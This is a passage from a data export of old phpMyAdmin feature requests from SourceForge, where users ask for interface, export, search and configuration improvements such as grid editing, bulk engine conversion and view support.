Original URL https sourceforge.net p phpmyadmin feature requests 610 https sourceforge.net p phpmyadmin feature requests 610 Original author poisa","enhancement"
"24444","5311","grid view with hot edit .
Instead of updating editing records one at the time, provide a grid view that allows hot edits e.g.
each field that is changed in the visible records in the grid is saved in the database).
And the records and fields that are visible in the grid, should be based on a query, so one can make admin views for several different users.
Original URL https sourceforge.net p phpmyadmin feature requests 612 https sourceforge.net p phpmyadmin feature requests 612 Original author ibec","enhancement"
"24444","5312","copy record.
I like to be able to select an existing record with a copy option.
And this will bring me in the edit window, except that an auto increment field is automatically populated with a new value.
Original URL https sourceforge.net p phpmyadmin feature requests 613 https sourceforge.net p phpmyadmin feature requests 613 Original author ibec","enhancement"
"24444","5313","Constructive criticism for suboptimal indexes.
A coworker of mine suggested that it might be helpful if PMA would take more notice of the indexes users create, and provide constructive criticism to the user in the event that indexes are created which have little or no value.
The immediate examples we came up with were having multiple identical indexes for the same column adding an index to a field that already has a unique index adding an index to a field that is already the primary key adding an index to a field X when you already have an index on columns X,Y), in that order but not if the existing index is on Y,X), in that order).
PMA should not prevent the creation of such indexes because PMA should also catch such indexes created outside of PMA or with older versions of PMA).
Instead, PMA should maybe display a warning message for any such indexes that exist, explaining why the index isn t useful.
PMA likely cannot contain logic to detect and report all the possible ways a nonsense index could be created, but it can at least recognize the above cases, and probably a few more.
And this would help those individuals who are not sufficiently versed in indexes.
This would include, for example, everyone in the web design company where I work, including me, except for the coworker who made this suggestion, who has just spent the past several days adding and fixing indexes in one of our larger applications.
The above suggestions are based on the most common errors he discovered made by other programmers in our project.
Original URL https sourceforge.net p phpmyadmin feature requests 616 https sourceforge.net p phpmyadmin feature requests 616 Original author ryandesign","enhancement"
"24444","5314","Current server clickable in left server menu.
In the server choice menu, when it s displayed as links and not as a select menu, let me click on the currently selected server to return to the main menu.
Doesn t make sense in the server menu that s shown on the main menu, but it does make sense in the server menu that can be shown in the left frame.
Original URL https sourceforge.net p phpmyadmin feature requests 617 https sourceforge.net p phpmyadmin feature requests 617 Original author ryandesign","enhancement"
"24444","5315","Redirect after Post.
Browser navigation like previous page and refresh page don t work for pages generated via POST.
Could you use a HTTP redirect location header) after each POST request to redirect the browser to a GET request page?
Original URL https sourceforge.net p phpmyadmin feature requests 614 https sourceforge.net p phpmyadmin feature requests 614 Original author olafvdspek","enhancement"
"24444","5316","Option to disable auto disabling of Browse .
When a table is empty, the Explore option is disabled.
If you then insert data into the table via another app, you first have to click on another option and then Explore is enabled again.
Is there a way to always enable Explore?
Original URL https sourceforge.net p phpmyadmin feature requests 615 https sourceforge.net p phpmyadmin feature requests 615 Original author olafvdspek","enhancement"
"24444","5317","Documentation link on cookie login page.
It might be helpful if the cookie login page had a link to the PMA documentation.
If login fails, you otherwise have to visit the PMA homepage to get to the documentation, or go hunting for the files on your server s) hard drive.
Someone just setting up PMA with cookie auth may make an error which prevents login, and such a user would want to be able to get to the documentation to see how to correct the error.
Original URL https sourceforge.net p phpmyadmin feature requests 618 https sourceforge.net p phpmyadmin feature requests 618 Original author ryandesign","enhancement"
"24444","5318","Better error reporting for InnoDB foreign keys.
I would like to make a request, which is that there be better error reporting when trying to add or delete a relation between tables using InnoDB.
There are a number of conditions required before a relation can be made, but currently the form doesn t report any error whatsoever.
It can be frustrating to use, because you can t see what sql command is being run, and so you can t see why it s failing.
Original URL https sourceforge.net p phpmyadmin feature requests 619 https sourceforge.net p phpmyadmin feature requests 619 Original author thujone","enhancement"
"24444","5319","Relations) Display multiple fields for relations.
Currently, in Relation View, you can only choose one field to display.
This presents a problem for tables such as a Contacts table since you will likely want to see both the first and the last name.
This can be solved by either allowing one to select mulitiple fields for display, and then using a concat statement to put them together or by allowing one to choose a key to display.
Then if one has a key on first and last name, it can concat the fields perhaps with a , separator.
Oh, and the Group field for this Support Request area does not include any of the 2.6.0 patch level releases.
Original URL https sourceforge.net p phpmyadmin feature requests 620 https sourceforge.net p phpmyadmin feature requests 620 Original author hplsbyufan","enhancement"
"24444","5320","Consistency order of icons tabs).
In the database view, the first icon is explore, then search, insert, properties.
But in the table view, the first is structure, then explore, SQL, search, insert.
And why are properties and structure used for the same page in the Dutch translation)?
Original URL https sourceforge.net p phpmyadmin feature requests 621 https sourceforge.net p phpmyadmin feature requests 621 Original author olafvdspek","enhancement"
"24444","5321","Mass convert table engines?.
We have hundreds of databases each with dozens of tables the major projects with hundreds of tables.
We would like to migrate these from ISAM and MyISAM to InnoDB.
The PMA interface isn t designed for this to change a table s engine, you have to go to the Properties view, then click the Operations tab, then scroll down, then select InnoDB, then click the submit button, and then repeat that for each table.
I m not sure what the better interface would be, but would there be a way to get an interface into PMA whereby you could select a group of tables and then convert these to a different engine all at once?
For example, by adding an option to the select menu at the bottom of the table list.
Conversion to InnoDB can fail.
Certain kinds of indexes and keys aren t supported by InnoDB.)
Probably similar issues with other engines.
So there would need to be some good error handling, reporting of errors for failed conversions, and it shouldn t just break off there, it should continue converting the remaining tables and report all encountered errors at once.
Original URL https sourceforge.net p phpmyadmin feature requests 622 https sourceforge.net p phpmyadmin feature requests 622 Original author ryandesign","enhancement"
"24444","5322","Add SQL tab to server view.
I d like to request the addition of the SQL tab to the tab bar that you see when viewing the Priveleges screen and the other screens that you get to from that tab bar).
When I m editing privileges, of course the SQL commands executed to change the priveleges are shown to me.
It can occur that I want to also execute SQL code now.
Perhaps I ve copied these displayed queries to a text editor and made changes and now want to execute the changed query.
I want to be able to click the SQL tab and paste in my new query, but there s no such tab.
Original URL https sourceforge.net p phpmyadmin feature requests 623 https sourceforge.net p phpmyadmin feature requests 623 Original author ryandesign","enhancement"
"24444","5323","bookmarks listbox on left panel.
It would be great if the bookmarks dropdown listbox is in a more accessible location, like on the left panel.
Original URL https sourceforge.net p phpmyadmin feature requests 624 https sourceforge.net p phpmyadmin feature requests 624 Original author erickoh","enhancement"
"24444","5324","Single SQL command on multiple DBs.
My company runs about 40 mirrored databases on the same server.
It would be great to run single or multiple SQL commands on all the databases at once, or be able to checkbox select the databases that the manual SQL command will apply to.
This I believe would be a fairly easy hack.
Original URL https sourceforge.net p phpmyadmin feature requests 626 https sourceforge.net p phpmyadmin feature requests 626 Original author jamieusa","enhancement"
"24444","5325","dontlimitchars option should be configurable.
In my case, I always wanted to see the full text but always had to do an extra click and query) each time i browse the tables.
I suggest having a cfg[ DontLimitChars ]=TRUE; option in config.inc.php Code change are minor and no risk.
thanks Original URL https sourceforge.net p phpmyadmin feature requests 625 https sourceforge.net p phpmyadmin feature requests 625 Original author erickoh","enhancement"
"24444","5326","new config.inc.php file.
Hello, I d like to add to PhpMyAdmin a small correction.
Every time when a new version of PMA will appear, user must edit config.inc.php file, to tune it up for his own parameters.
But now, when a config.default.php file exist, I propose that config.inc.php file could look f.e.
like in the attached file.
I think it s a better solution to set only own parameters in config.inc.php file, and the rest params can be include from config.default.php file.
Original URL https sourceforge.net p phpmyadmin feature requests 627 https sourceforge.net p phpmyadmin feature requests 627 Original author kraksoft","enhancement"
"24444","5327","Double underscores in PMA table names.
I suggest the PMA tables by default get created with double underscores at the front pma bookmark, pma relation, etc.
to conform with default settings cfg[ LeftFrameTableSeparator ] = when cfg[ LeftFrameLight ] == FALSE.
If you agree, then changes would need to be made in the default config.inc.php, in the two create tables.sql scripts, and probably elsewhere documentation?)
Original URL https sourceforge.net p phpmyadmin feature requests 628 https sourceforge.net p phpmyadmin feature requests 628 Original author ryandesign","enhancement"
"24444","5328","On file import, show name of imported file.
I d love to see you add the name of the just imported file to the result being shown after file import.
Often upload size is limited to ie.
8 MB file I sat uploading 53 !)
chunks the other day and got quite nervous that I d make a mistake and sure enough, I double uploaded a file by mistake causing 400 items to be doubled in a forum) this could ease the use greatly.
So, just to clarify Instead of Your SQL query has been executed successfully The content of your file has been inserted.
8007 Instructions) I d like to see it respond Your SQL query has been executed successfully The content of your file C \Arbejdsfolder\Opgaver\5.SQL has been inserted.
8007 Instructions) path isn t important, but filename is IMHO) thanks.
Original URL https sourceforge.net p phpmyadmin feature requests 629 https sourceforge.net p phpmyadmin feature requests 629 Original author dk alleykat","enhancement"
"24444","5329","Programmers table index.
Hi, Just a small feature request .. add an option to display the table structure with a numbered list.
When programming I use select from.. quite a bit and when I reference it later as row[0] for the first column it would be nice if the table structure list in phpmyadmin had an number next to it so I could easily see which number the column I need next has.
As it is I have to count the columns every time I need to reference them.
In a large table this can be a bother ) regards, Tobias Original URL https sourceforge.net p phpmyadmin feature requests 630 https sourceforge.net p phpmyadmin feature requests 630 Original author ldte","enhancement"
"24444","5330","Texfile cvs) upload issue, when having seperate Web DB Srv.
Hello We have got a Web Server running on Win2000 SP4 with IIS, PHP, PHPmyAdmin and a DB Server running on Win2000 SP4 with MySQL 3.5x When uploading a Textfile cvs) into a Table in PHPmyAdmin, we always get the same error LOAD DATA INFILE D \\APPL\\PHP\\uploadtemp\\phpD1.tmp INTO TABLE `test` FIELDS TERMINATED BY ; ENCLOSED BY ESCAPED BY \\ LINES TERMINATED BY \r\n MySQL meldet File D \APPL\PHP\uploadtemp\phpD1.tmp not found Errcode 2) No one could help us till know with this Problem.
Is this a Bug or maybe a feature request or does this only work with LAMPs?
Kind regards Mike Maier Original URL https sourceforge.net p phpmyadmin feature requests 631 https sourceforge.net p phpmyadmin feature requests 631 Original author mikemaier","enhancement"
"24444","5331","SimplePMA for ordinary users.
it would be nice to have an option in pma to limit the complexity of the interface.
most users don`t need all the functionality and it would be nice to use pma to offer it to a customer so he she can edit his tables easily.
the only things needed for this is the option Browse , Search and Insert in the table view.
Structure, export, sql and operations is something only needed for administrators.
an option in config.inc would be nice like cfg[ SimplePMA ] that disables all special functions.
you could offer different config.inc Sets that are preconfigured for 1\.
Maximum useability 2\.
Standard like now) and 3\.
Simple PMA Original URL https sourceforge.net p phpmyadmin feature requests 632 https sourceforge.net p phpmyadmin feature requests 632 Original author rubo77","enhancement"
"24444","5332","Save Entries with Strg s. Hi, is it possible to integrate the short key Strg s to save submit forms?
regards Karsten Original URL https sourceforge.net p phpmyadmin feature requests 633 https sourceforge.net p phpmyadmin feature requests 633 Original author gerdiweb","enhancement"
"24444","5333","SQL export compatibility.
Hi I would like to see a switch to choose compatibility of exports.
In my case I had some troubles to export from MySQL 4.1 and import it to MySQL 4.0.xx.
Thanks red Original URL https sourceforge.net p phpmyadmin feature requests 634 https sourceforge.net p phpmyadmin feature requests 634 Original author finex","enhancement"
"24444","5334","Support for MEMORY table type.
Why in you interface in combobox i not found table type MEMORY ?
You support HEAP , but not support MEMORY type?
or it s Bug?
;) Difference between MEMORY and HEAP type, plz read article http dev.mysql.com doc mysql en HEAP.html Original URL https sourceforge.net p phpmyadmin feature requests 635 https sourceforge.net p phpmyadmin feature requests 635 Original author alexmnt","enhancement"
"24444","5335","add search icon on the left panel.
hi, can we image a new icone search icon) where appears the list of tables ?
actually,there is the browse button mysql themes original img b sbrowse.png gt; gt;mysql sql.php?lang=en iso 8859 1 server=2 db=DB table=tableName sql query=SELECT 2A FROM 60table 60 pos=0 goto=tbl properties structure.php thanx Original URL https sourceforge.net p phpmyadmin feature requests 636 https sourceforge.net p phpmyadmin feature requests 636 Original author veryfree","enhancement"
"24444","5336","Custom Field Handlers.
I would really like to have the ability to create and specify a HTML WYSIWYG editor, or a calendar widget, or a file upload box, etc to replace the normal HTML textarea used to edit fields.
I should be able to look at the table in relation view??
or when creating fields??)
and choose available field handler widgets from dropdown boxes for each field.
Also, I should be able to validate manipulate data on a field by field basis.
I could deny the update and send an error message if a checksum on a credit card field failed.
Or I could execute a PHP strtotime ) to make a timestamp.
I am willing to help with this task.
Please contact me at kyle efactormedia com.
Replace the pound signs) Original URL https sourceforge.net p phpmyadmin feature requests 637 https sourceforge.net p phpmyadmin feature requests 637 Original author kylemax","enhancement"
"24444","5337","Sort Enable Disable.
I think it will be great if we could disable and enable the sort function in the export of sql files.
Because on my localhost is the new 4.1.0 version of mysql.
On my webspace is the 4.0.20 version.
So i must every time if i export the files from my localhost and import it to my webspace remove the sort part from the sql file so that 4.0.20 phpmyadmin on my webspace import the sql file correctly.
Original URL https sourceforge.net p phpmyadmin feature requests 638 https sourceforge.net p phpmyadmin feature requests 638 Original author komandar","enhancement"
"24444","5338","Support for views.
you re neither able to create, alter, drop views in phpMyAdmin, nor can you select data from it.
SHOW TABLE STATUS or table type field from SHOW TABLES) Original URL https sourceforge.net p phpmyadmin feature requests 639 https sourceforge.net p phpmyadmin feature requests 639 Original author har050277","enhancement"
"24444","5339","proper handling of tinyint 1) in edit and insert mode.
It would be very cool if tinyint 1) fields would be handled with yes no checkboxes instead of plain editbox as they are in latest version.
This implementation should interest record edit and insert new record pages only.
Regards.
Original URL https sourceforge.net p phpmyadmin feature requests 640 https sourceforge.net p phpmyadmin feature requests 640 Original author themnemonic","enhancement"
"24444","5340","Relation > display value dropdown double list sort .
When inserting into a linking to table only do the display value double listing in the select dropdowns when the display and linked to columns are not the same.
Explanation Using the sales table from the recommended tutorial http www.garvinhicking.de tops texte mimetutorial creatingrelations as an example My linking to column select dropdown has the following options |1 Garvin Hicking |2 Emba |3 Andreas Bertram |4 Marc Delisle |5 Sebastian Bergmann | | |Andreas Bertram 3 |Emba 2 |Garvin Hicking 1 |Marc Delisle 4 |Sebastian Bergmann 5 that makes useability sense... however, I ve created a username relationship and |bkdotcom bkdotcom |lem9 lem9 |nijel nijel | | |bkdotcom bkdotcom |lem9 lem9 |nijel nijel is confusing overkill.
I m new to this and thought something was borked.
Original URL https sourceforge.net p phpmyadmin feature requests 641 https sourceforge.net p phpmyadmin feature requests 641 Original author bkdotcom","enhancement"
"24444","5341","SqlServer Support.
Support for MS Sqlserver was planned ?
Original URL https sourceforge.net p phpmyadmin feature requests 642 https sourceforge.net p phpmyadmin feature requests 642 Original author jumping69","enhancement"
"24444","5342","Export to OASIS Open Document.
OASIS Open Office XML File Format will be common format used in upcoming releases of OpenOffice.org, KOffice and probably others.
Whe should add export to this format.
Some references http europa.eu.int ida en document 3197 http europa.eu.int ida en document 3428 http www.oasis open.org committees tc home.php?wg abbrev=office Original URL https sourceforge.net p phpmyadmin feature requests 643 https sourceforge.net p phpmyadmin feature requests 643 Original author nijel","enhancement"
"24444","5343","Selectable auto browse tabs.
Maybe this is already a feature, or possible using bookmarks which I don t have access to, since my server provides phpMyAdmin), but I think it would be a great time saver if you could select a tab browse insert operations) to be automatically displayed after you click on any table, especially browse.
This would speed things up dramatically for me since I generally never work with the structure, but I always work with browse.
And when I m reorganizing my tables, it would great to make the operations tab the default.
It would definitely help out those of us who don t have lightning fast load times.
Original URL https sourceforge.net p phpmyadmin feature requests 644 https sourceforge.net p phpmyadmin feature requests 644 Original author ogprods","enhancement"
"24444","5344","db table comparer.
i always develop my webaplication on my develop machine and then move it to production machine.
So it would be great to be able to compare 2 databases tables and update the production db so it reflects the development db without having to drop the production db because it might already contain valuable data.
This can be done by comparing and then running a bath of ALTER sql statements.
see http ems hitech.com mysqlutils mycomparer for an example app.
i know i could do this myself but i do not have any time for it ; Original URL https sourceforge.net p phpmyadmin feature requests 645 https sourceforge.net p phpmyadmin feature requests 645 Original author bartholomew007","enhancement"
"24444","5345","Non Frames Version.
Hello, Wouldn t it be great to have a non frames version of phpMyAdmin so that it can work on all browsers well nearly) reliably.
In web design, frames went out of the window excuse the pun) a long time ago!
Without too much work, a table based version can be created.
With the left frame being replaced by a table cell and the main frame by another.
As phpMyAdmin is coded in PHP, it would just require a few include files to make the move.
The non frames version would make the clumsy, old, frames version obsolete and improve things for the users vastly.
With a little more work, a CSS version could be created allowing phpMyAdmin to be accessible to everyone!
What do you guys think?
Looking forward to your feedback.
Original URL https sourceforge.net p phpmyadmin feature requests 646 https sourceforge.net p phpmyadmin feature requests 646 Original author bjanjua","enhancement"
"24444","5346","jump to next entry.
One of our researchers made this request.
It is a very good idea gt; Right now you access [an entry] by clicking on edit, gt; when you re done you have two choices go back to the list gt; or enter a new entry.
Is there any way to add another gt; choice jump to the next gt; entry?
It would save a lot of time.
I m not sure how you would do that though?
It would have to be the next entry defined by an index field?
JTJohnston www.CompCanLit.ca No sense being an Open Source user if I don t contribute something to the project.
Original URL https sourceforge.net p phpmyadmin feature requests 647 https sourceforge.net p phpmyadmin feature requests 647 Original author jtjohnston","enhancement"
"24444","5347","number of records beside table name.
It would be very useful if beside the table names it showed the number of records in the table.
I m used to using MySQL Front which has this function) but my latest project I have to use phpMyAdmin so it s taking me longer to know where I am and what s happening.
Pance.
Original URL https sourceforge.net p phpmyadmin feature requests 648 https sourceforge.net p phpmyadmin feature requests 648 Original author pance","enhancement"
"24444","5348","Browse for cfg[ DefaultTabTable ].
cfg[ DefaultTabTable ] does not include the Browse tab.
It could.
It should?
Read Marc s book on page 36.
He says some users prefer to avoid seeing the structure so this was added to bring up something different.
I would prefer to go to the Browse tab, which is where I do most of my work.
Are there anymore Possible values I missed?
John cfg[ DefaultTabTable ] = tbl properties structure.php ; Possible values tbl properties structure.php = fields list tbl properties.php = sql form tbl select.php = select page tbl change.php = insert row page Original URL https sourceforge.net p phpmyadmin feature requests 649 https sourceforge.net p phpmyadmin feature requests 649 Original author jtjohnston","enhancement"
"24444","5349","Field comment.
This is not really possible is it?
I would like to have a comments field, not just for the table, but also for each field.
Something where a mouseover might give a small explanation of what my field is.
Original URL https sourceforge.net p phpmyadmin feature requests 650 https sourceforge.net p phpmyadmin feature requests 650 Original author jtjohnston","enhancement"
"24444","5350","In database SQL tab, show fields from all tables.
Please consider adding a column to the database level SQL query page that would list all fields in the database in database.field format.
The feature should work just like it currently does on the table level SQL query page, but should allow access to all fields in the database.
The intent is that it would be easier to write simple joins without having to recall all the field names in the db.
Original URL https sourceforge.net p phpmyadmin feature requests 651 https sourceforge.net p phpmyadmin feature requests 651 Original author yinon","enhancement"
"24444","5351","Simple interface for data entry.
I have some non technical users using phpmyadmin to update information in a database.
They are confused by all of the extra admin oriented stuff in pma.
If there was a simple, streamlined mode that let a user SELECT, INSERT, UPDATE, DELETE, and search, it would be really useful.
It could be active when the database user only has those privileges, or by a config setting.
Thanks!
Original URL https sourceforge.net p phpmyadmin feature requests 652 https sourceforge.net p phpmyadmin feature requests 652 Original author kylemax","enhancement"
"24444","5352","count selections.
maybe when you re at the Row view or Table Structure view and you select a row field and it selects it and highlights it, you could have a thing on the side that moves with you as you scroll that shows how many rows fields you have selected as you scroll... just a suggestion Original URL https sourceforge.net p phpmyadmin feature requests 653 https sourceforge.net p phpmyadmin feature requests 653 Original author dbatch07","enhancement"
"24444","5353","Range Search Capability.
In the search screen, allow one to select range of values.
Comes handy to check date ranges, autoincrement type fields, etc.
If the feature is already implemented, please let me know.
Original URL https sourceforge.net p phpmyadmin feature requests 654 https sourceforge.net p phpmyadmin feature requests 654 Original author deltasig","enhancement"
"24444","5354","compatibility.
For SQL exports it would be interesting to be able to export data in mysql 4.0.x readable format when the database server is in 4.1.x as the option mysqldump uses is compatible=mysql40 Original URL https sourceforge.net p phpmyadmin feature requests 655 https sourceforge.net p phpmyadmin feature requests 655 Original author herel","enhancement"
"24444","5355","Find Replace.
It would excellent if phpMyAdmin could have a Find Replace screen.
It could search through the whole table, or just through a specified field and replace the specified value with a second specified value.
Thanks for your great work!
Timothy Original URL https sourceforge.net p phpmyadmin feature requests 656 https sourceforge.net p phpmyadmin feature requests 656 Original author tbrinkley","enhancement"
"24444","5356","Alter privileges when renaming database table fields.
I was wondering if you could add a checkbox when renaming which would deal with realigning privileges in the mysql database, when renaming.
or at least add to the success message a reminder about updating privilieges.)
thanks.
t. Original URL https sourceforge.net p phpmyadmin feature requests 657 https sourceforge.net p phpmyadmin feature requests 657 Original author stjohn6699","enhancement"
"24444","5357","Faster navigation in calendar.
Steps to reproduce 1\.
Create a database 2\.
Create a table say Employee under the database.
3\.
Let one of the field in the table be date whose datatype is Date 4\.
select the tab Insert to insert a row in that table.
It opens a window where one of the field is date, besides which a calender icon is displayed.
Click on the calender icon, it opens a new window which displays the calender.
Actual If the month in that is Dec, if we want to traverse to Jan we have to traverse step by step covering all the months.
Expected If we have a calender where we can directly select the month that would be more userfriendly.
Original URL https sourceforge.net p phpmyadmin feature requests 658 https sourceforge.net p phpmyadmin feature requests 658 Original author poornimad","enhancement"
"24444","5358","Copy table in table details page.
It would be nice to have the Copy Table feature in the table details page db details structure.php) Original URL https sourceforge.net p phpmyadmin feature requests 659 https sourceforge.net p phpmyadmin feature requests 659 Original author voltagex","enhancement"
"24444","5359","Default Charset backwards compatibility.
Hi, I run MySQL 4.1.7 on my home computer as part of my PHP app developing environment.
Using PMA 2.6.0, It adds the DEFAULT CHARSET and COLLATION entries when exporting structure and data).
The problem is that not every website I develop uses such a modern version of MySQL on their remote server.
The PMA versions they use are not expecting these newer commands, and hence return errors.
It s simple to manually delete them and upload the edited sql file or simply enter the text into the query box under SQL , howerver with having to import data in such a field that has 30,000 rows) can put a big strain on my browser, not to mention taking ages on this supposive 512K Thai DSL connection.
It would be nice to have it exported as a .gz, edit it and repack the GZ, but I haven t the software to re pack files into a gz, so I am forced to upload the entire sql file or text into the textfield.
It would be nice to see a checkbox or the like that could be checked to remove such modern comments, for backwards compatibilty.
Pamhnokan Sriphanabhumet Original URL https sourceforge.net p phpmyadmin feature requests 660 https sourceforge.net p phpmyadmin feature requests 660 Original author peeb","enhancement"
"24444","5360","FTP Upload possibility.
Perhaps an idea.
I word with great databases forum) to import when something went wrong.
But uploading more than 5 Mb through http never seems to work.
Perhaps an idea to make an upload directory where you can place a file though ftp and then import in phpMyAdmin to the database.
Original URL https sourceforge.net p phpmyadmin feature requests 661 https sourceforge.net p phpmyadmin feature requests 661 Original author jeffstein","enhancement"
"24444","5361","Save cookie name password.
Hi I have a pretty simple request for the cookie auth method A pref to customize expiration time of the cookies.
Currently, the password cookie expires when the browser is closed.
Some of us use PMA in a secure, intranet environment with multiple servers and want the login to be valid for a fixed time.
So how about adding a pref allowing us to set that time?
It took me about 30 seconds to customize line 626 of cookie.auth.lib.php but others might find this useful.
Thanks.
Original URL https sourceforge.net p phpmyadmin feature requests 662 https sourceforge.net p phpmyadmin feature requests 662 Original author damaget","enhancement"
"24444","5362","Export to email.
Why not allow the possibility to export to an email?
Just create the file somewhere temporary and be able to send it to an email.
Maybe via a template email, so people can modify the default mail that will be sent.
Original URL https sourceforge.net p phpmyadmin feature requests 663 https sourceforge.net p phpmyadmin feature requests 663 Original author g00fy","enhancement"
"24444","5363","Config Defaults for Insert data from a textfile .
It would be nice if I could set option defaults for the Insert data from a textfile in table page in the config file.
For instance, I d like fields terminated by to default to , rather than ; .
Also, I d like fields enclosed by optional) to be checked by default.
It would seem reasonable to make the defaults for this form configurable, esp.
since I have to keep entering the same options each time I load similar CSV files.
Original URL https sourceforge.net p phpmyadmin feature requests 664 https sourceforge.net p phpmyadmin feature requests 664 Original author smagruder","enhancement"
"24444","5364","Rename tbl row delete.php to tbl row action.php.
version PHPMyAdmin phpMyAdmin 2.6.0 pl2 When exporting selected rows from page with table records sql.php?lang=... server=.
db=... table=...s goto=tbl properties.php back=tbl properties.php sql query=SELECT 2A FROM 60... 60 pos=0), the target action is tbl row delete.php lt;form method= post action= tbl row delete.php name= rowsDeleteForm gt;) This name reflected the reality in previous versions, where rows could be only deleted.
Now multiple rows can be deleted or updated or exported.
I was a little confused when I wished to export some rows and the URL was tbl row delete.php Rename target script from tbl row delete.php to tbl row action.php would prevent this confusion Original URL https sourceforge.net p phpmyadmin feature requests 665 https sourceforge.net p phpmyadmin feature requests 665 Original author jamaz","enhancement"
"24444","5365","Binary log search.
I wrote this simple script for myself to keep track of changes in the the DB.
You can search for a substring in a queryin a specific file or in all files.
It would be great if you implement it in PMA.
Original URL https sourceforge.net p phpmyadmin feature requests 666 https sourceforge.net p phpmyadmin feature requests 666 Original author j0erch","enhancement"
"24444","5366","Binary Log shows all entries that s too much.
You should put in a limit for displaying the binary log.
I have set my binray log files to 128000 kB max.
When I click on binary lock and PMA is listing all the entries of one binary log file my browser doesn t like it.
Maybe you should also have a look at RFE 1099317 in this case ;) Original URL https sourceforge.net p phpmyadmin feature requests 667 https sourceforge.net p phpmyadmin feature requests 667 Original author j0erch","enhancement"
"24444","5367","Blob Show hex.
Could you add an option to) show blob fields as hexadecimal values instead of as weird characters?
Original URL https sourceforge.net p phpmyadmin feature requests 668 https sourceforge.net p phpmyadmin feature requests 668 Original author olafvdspek","enhancement"
"24444","5368","check table with lose.
Could be the link of Chek table with lose Cocher tables avec pertes in french) could be changed from http somedomain.tld somepath phpMyAdmin to http somedomain.tld somepath phpMyAdmin db details structure.php?lang=fr iso 8859 1 server=1 db=somedbname checklose=1 because I have vhost and the first link open a phpMyAdmin welcome page instead of checking the non optimized table...
Original URL https sourceforge.net p phpmyadmin feature requests 669 https sourceforge.net p phpmyadmin feature requests 669 Original author rapsys","enhancement"
"24444","5369","Add byte order marker BOM) to UTF 8 files.
I have anywhere recoding on in phpMyAdmin 2.6.1 rc2, and I m using MySQL 4.1.8.
When I select utf 8 as the export charset which is default) the resulting file does not begin with the utf 8 byte order marker which would enable my text editor to recognize it as a utf 8 file.
Also, we have found that Excel 2003 for PC will only recognize a csv file as utf 8 if the file is opened using the Open dialog and the file has the utf 8 byte order marker.
So, the feature request is to add the byte order marker to the beginning of exported utf 8 files, or at least to provide an option either on the export screens or in the config file) to do so.
The utf 8 byte order marker is the three hex bytes EFBBBF.
Simply adding these three bytes at the beginning of exported utf 8 files closes this feature request.
Original URL https sourceforge.net p phpmyadmin feature requests 670 https sourceforge.net p phpmyadmin feature requests 670 Original author ryandesign","enhancement"
"24444","5370","DATADICTIONARY page break before bad idea).
DATADICTIONARY PRINTOUT The CSS style page break before always) is a bad idea because it is not only hard to have to flip around to see tables on each individual page, but is a paper waster.
I suggest removing or creating a radio button to toggle.
Original URL https sourceforge.net p phpmyadmin feature requests 671 https sourceforge.net p phpmyadmin feature requests 671 Original author solarfactory","enhancement"
"24444","5371","DB alias table alias for each server.
Hi, Now I m using many databases on localhost, because some ISP setup their MySQL Server like listet below MySQL is running as localhost each database for the users is named like usrdb username is a number) I setup up my config.inc.php with all my servers databases) and I get the dropdownbox for server select like this localhost usrdb username 1 username) ... localhost usrdb username 5 username) With usrdb username username) it s confused, because I must really know which db stores my required datas.
Now I ve added cfg[ Servers ][ i][ db alias name ]= Forum DB ; and modified the libraries select server.lib.php to show an alias for server database.
Is it possible to include this in PMA?
Regards Michael Original URL https sourceforge.net p phpmyadmin feature requests 672 https sourceforge.net p phpmyadmin feature requests 672 Original author mkkeck","enhancement"
"24444","5372","force SSL.
could be useful a simple way to force HTTPS through PHP Force HTTPS if required if FORCE SSL == 1 !isset SERVER[ HTTPS ]) || SERVER[ HTTPS ] != on )) \{ url= SERVER[ HTTP HOST ].
SERVER[ REQUEST URI ]; header Location https url ); \} Alessandro De Zorzi Original URL https sourceforge.net p phpmyadmin feature requests 677 https sourceforge.net p phpmyadmin feature requests 677 Original author lotabi","enhancement"
"24444","5373","logo left.png link should be configurable.
It is possible to have a custom logo left.png in the upper left corner.
Consequently it should also be possible to configure the surrounding href element, i.e.
the address it points to, through an additonal configuration option like cfg[LogoHref] or something.
Original URL https sourceforge.net p phpmyadmin feature requests 678 https sourceforge.net p phpmyadmin feature requests 678 Original author ndabezitha","enhancement"
"24444","5374","store browse preferences in cookies?).
I love phpmyadmin .
Very useful.
However, I have a usability issue that could be solved easily, I would think.
For the type of work I m doing, browsing selecting by LIMIT ing 30 rows at a time doesn t really work for me.
I need to see all lines, or at least a group considerably bigger than just 30 rows, in a table.
As a result, I have to change the display settings each and every time e.g.
3000 rows, starting with row 0).
It is just annoying having to do that, and it doesn t make sense.
Would it be possible to just store these preference settings in a cookie or so?
You can even make it so that there is a checkmark box to give the user control over the existence of such a cookie, just like many log on screens nowadays?
Original URL https sourceforge.net p phpmyadmin feature requests 673 https sourceforge.net p phpmyadmin feature requests 673 Original author rkalkman","enhancement"
"24444","5375","schema diff.
There is a perl module for mysql that allows schemas to be compared, with many options to generate reports files containing the differences and the alter tables required to bring both database in step.
See http www.adamspiers.org computing mysqldiff This sort if functionality would be wonderfull in this top class tool.
Original URL https sourceforge.net p phpmyadmin feature requests 674 https sourceforge.net p phpmyadmin feature requests 674 Original author cws1","enhancement"
"24444","5376","ability to merge tables with the same names.
the ability to merge an sql dump into a database and if the same names appear it will add ALTER) any fields from the dump that arn t in the database REASON im working on a new system designing at work and at home i could work on a database online, but while im working on the database im not thinking about security i.e who can remember password when trying to code fast so i just use null passwords) plus the PHP isn t online makes it easier to code) so any database is in the open Original URL https sourceforge.net p phpmyadmin feature requests 675 https sourceforge.net p phpmyadmin feature requests 675 Original author scoles","enhancement"
"24444","5377","Search Replace INSIDE of a text field.
It would be great to be able to search replace inside of a text field ie Search for foo In column f replace Replace with bar Would replace foobar in f replace with barbar It would be even better if the search for would accept PCRE.
Thanks!
Original URL https sourceforge.net p phpmyadmin feature requests 676 https sourceforge.net p phpmyadmin feature requests 676 Original author mwalkup","enhancement"
"24444","5378","Database referential integrity check.
phpMyAdmin is able to check referential integrity for one table at time but is not able to check referential integrity for all the tables of a database in one shot.
This would be useful for huge database.
Original URL https sourceforge.net p phpmyadmin feature requests 679 https sourceforge.net p phpmyadmin feature requests 679 Original author giannitom","enhancement"
"24444","5379","whitespace nightmare.
I don t know where to post about this, but since it cost me over 2 hours of debugging, I thought this might be the best place.
After building a dynamic query I ran it in phpmyadmin and it was successful.
When I tried to run the same query through a php script, I got DB errors.
The outputted error didn t make sense to me at the time, since the query was running in phpmyadmin.
